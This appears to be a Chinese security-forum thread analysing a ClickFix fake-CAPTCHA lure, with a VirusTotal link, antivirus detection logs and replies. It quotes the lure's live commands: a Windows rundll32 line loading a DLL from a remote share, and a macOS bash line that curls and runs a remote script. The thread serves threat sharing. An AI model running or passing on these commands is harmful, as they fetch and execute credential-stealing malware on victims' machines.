ClickFIx 1X

谈谈MEMZ

衍生物 DLL 1X
@Bocchi通过QQ闪传分享了【verification.zip】
链接：https://qfile.qq.com/q/b1LrmENQL

VT 6/71
https://www.virustotal.com/gui/f ... e96675bc8d1614c76b9

来源 毒网分析区

1. hxxps://east-timor.org/parliamentary-commission-recommends-unified-federation-for-better-oversight/

复制代码

Windows 执行

1. rundll32.exe \\plasmapublic.flare-path.in.net\verification.google,#1
   
2. 然后输入 I am not a robot - reCAPTCHA Verification ID: 8409199

复制代码

Macos 执行

1. /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 's69o1bbf.lakeweb.digital/?=check&&actmn=vVWKnqMQJtmmdhRr')"; echo ""BotGuard: Answer the protector challenge. Ref: 42586

复制代码

---

Cortex Kill

啊松

不执行了。

UNknownOoo

火绒

1. 风险分类：木马盗号
   
2. 访问网址：east-timor.org
   
3. 操作结果：已阻止
   
4. 
   
5. 进程ID：8100
   
6. 操作进程：C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
   
7. 操作进程命令行："C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --startup-read-main-dll --metrics-shmem-handle=2440,i,16343961439818734130,17940342845097241225,524288 --field-trial-handle=2160,i,11239000540239754979,15370321415350479724,262144 --variations-seed-version --pseudonymization-salt-handle=2296,i,17190895461550070151,2966495279996812431,4 --trace-process-track-uuid=3190708989122997041 --mojo-platform-channel-handle=2592 /prefetch:3

复制代码

dll扫描运行均未检出